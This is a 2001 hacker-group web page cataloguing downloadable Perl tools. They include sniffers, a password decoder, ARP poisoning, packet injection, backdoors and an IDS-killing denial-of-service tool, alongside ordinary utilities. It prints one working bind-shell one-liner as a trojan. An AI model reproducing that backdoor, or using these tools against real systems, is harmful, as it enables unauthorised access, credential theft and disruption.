dachb0den .

archives . tools . passive scanning
PDump v0.80
PDump is a thorough perl based tcpdump utility that provides many features available in other passive network mapping applications including passive os detection, active response to certain conditions, and data injection into open tcp connections without loss of connectivity.
> Download PDump
> PDump Homepage

NDump v0.1
NDump is a simple perl script that dumps raw data from the network to a capture file. The capture file it generates can be used with nparse and naimpass to perform various analysis operations on the network data. It also provides a flexible environment for coding your own perl scripts to perform custom analysis on logged packets.
> Download NDump
> NDump Homepage

NParse v0.1.5
NParse is a perl script that analyzes ndump output files and prints the network data in readable form (hex, oct, dec, and ascii). It's useful for debugging network protocols and analyzing implementation problems.
> Download NParse
> NParse Homepage

NAIMPass v0.1
NAIMPass is a perl script that demonstrates the lack of security with AOL's AOLIM password "encoding" scheme. It will analyze a ndump output file, find AOLIM authentication packets and decode the username and password being sent to the login server.
> Download NAIMPass
> NAIMPass Homepage

RawSnif v0.8
RawSnif is a simple, configurable perl script that allows you to filter data being sent across tcp/ip connections (similar to ngrep). This makes it easy to sniff plaintext usernames/passwords going across the network.
> Download RawSnif
> RawSnif Homepage

archives . tools . active scanning
NBChk v0.1
NBChk is a customizable, multi-process, banner checking port scanner that will scan a range of hosts for a port that matches a specific string. This is useful for checking for vulnerable services on a range of hosts.
> Download NBChk
> NBChk Homepage

tkscan.pl
tkscan is a simple port scanner that uses perl/tk.
> Download tkscan.pl

Pedesis v0.01
Pedesis is a perl version of nemesis for userland based packet injection. It uses the Packet:: perl module, a 100% perl packet manipulation suite for injection/sniffing and encoding/decoding. The library and pedesis are still a work in progress, so support may be limited.
> Download Pedesis
> Pedesis Homepage

archives . tools . libraries
Packet::
Packet is a module that attempts to implement libpcap/libnet as a perl module using 100% perl (no xs or c), meaning you get the same features as libpcap/libnet (with more portability) without libpcap or libnet.
> Download Packet::
> Packet:: Homepage

archives . tools . spoofing
tracertspoof.pl
This is just a proof of concept which spoofs routes when someone traceroutes you. That means if someone traceroutes you, they will see spoofed routes and your host's ip at the end of the list.
> Download tracertspoof.pl

arpredir.pl
This program uses Packet:: to arp poison a switch, meaning you can have packets destined to other hosts forwarded to you by the switch (which can then be forwarded to the real host through ipforwarding) so you can sniff/inject.
> Download arpredir.pl

inject.pl
This program uses Tk for a GUI and allows you to inject tcp/udp/icmp packets with a nice little interface.
> Download inject.pl

console-inject.pl
This is the same as inject.pl, but for console.
> Download console-inject.pl

raw-ident.pl
An identd daemon that controls its connection raw, not using functions such as socket(), send()/recv(), etc. Intended as an example 'base' for other raw daemons.
> Download raw-ident.pl

archives . tools . cryptography
md5.pl
Perl implementation of the md5 algorithm with string and file calculation for message-digest fingerprints (checksums).
> Download md5.pl

cp5qrpff-fast.pl
Cp5's version of the original 531-byte qrpff-fast (DeCSS descrambling code). He was able to cut it down to 504-bytes using the same algorithm so it's the same speed as the original.
> Download cp5qrpff-fast.pl

cp5qrpff.pl
Cp5's version of the original 526-byte qrpff (DeCSS descrambling code). He was able to cut it down to 500-bytes using the same algorithm so it's the same speed as the original.
> Download cp5qrpff.pl

crypto.pl
A program that uses Term::ReadKey to interface with crypt.pl and create passwords without the password being displayed when you type it.
> Download crypto.pl

decrypto.pl
Same as crypto.pl except it checks the encrypted and plain passwords to see if they match. It also hides the passwords when you type them in.
> Download decrypto.pl

cracker.pl
Perl based brute forcer for an encrypted password, using a specified list.
> Download cracker.pl

clear.txt
Converting perl code to 'nothing' and then executing it from 'nothing'.
> Download clear.txt

archives . tools . trojans
frontdoor.pl
A simple replacement for telnetd. It has some nice things such as pty opening, all the good ANSI stuff can pass through the socket, and some other fun stuff.
> Download frontdoor.pl

pdoor
An old backdoor that doesn't open any ports and allows you to run programs remotely with a client that spoofs the source of the host. Portscans will never find the backdoor, since it only looks for certain types of packets and needs no 3-way handshakes.
> Download pdoor
> pdoor Homepage

K-Rad One-Liner Bindshell
perl -MIO -e 'while($c=new IO::Socket::INET(LocalPort,9,Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}' - nuff said

archives . tools . denial of service
killmon.pl
This program attempts to kill all sniffers/network monitors/IDSs on your network or a remote host by using different denial of service attacks on passive network monitors.
> Download killmon.pl

pijack
Old and ugly program that cp5 wrote when he started getting into sockets. It takes over IRC DCC connections before they get fully established.
> Download pijack

archives . tools . other
ping.pl
This is a program that allows you to ping a host through ICMP and tcp, which allows you to see if a host is up even if icmp is blocked.
> ping.pl

mp3-stream.pl
Mp3-stream allows you to switch between using your microphone and playing random mp3s on a live mp3 server for everyone to connect to. You can have something like a small talk radio show, have people listen to music then switch over to microphone and talk about music and then play some more music when everyone starts disconnecting :)
> Download mp3-stream.pl

c2p.pl
c2p.pl is a replacement for perl's h2ph (C header to perl header). It does stuff like convert structs to hashes, create the %SIZEOF hash for the size in bytes of actual structs, and other stuff. To be used with Packet::.
> Download c2p.pl

hybbot
hybbot is an IRC operator and channel service specifically written for SUIDNet, a fully ssl encrypted irc chat network.
> Download hybbot

greph.pl
This is a program that takes a list of c/c++/header files and looks through all of them for a regexp recursively, which can be neat. Let's say you're looking for a certain function in a program, but it's not in that program, and it's not in any of the headers that program uses. It would have to be in one of the headers of one of the headers, or could even go further. greph.pl will look through all of these files and keep looking recursively without repeating files.
> Download greph.pl

mass.pl
mass.pl allows you to run one command on multiple files when that command only allows you to run it on one file. One example is tar. Say you want to tar -xvf a few different tarballs, but tar only allows you to do one at a time. With mass.pl you can easily do something like ./mass.pl 'tar -xvf *.tar'.
> Download mass.pl

mkmod.pl
mkmod.pl allows you to take a normal perl program and easily convert it into a module, making the easy work easier :) Good to use when you're doing this with a lot of programs and want something automated.
> Download mkmod.pl

burn.pl
burn.pl is a program that uses tk as a gui interface with mkisofs and burncd to easily burn cds.
> Download burn.pl



copyright © 2001, dachb0den labs - aus der dose. please send any comments, suggestions, questions to the .
all information is property of dachb0den, distribution is permitted as long as credit is given.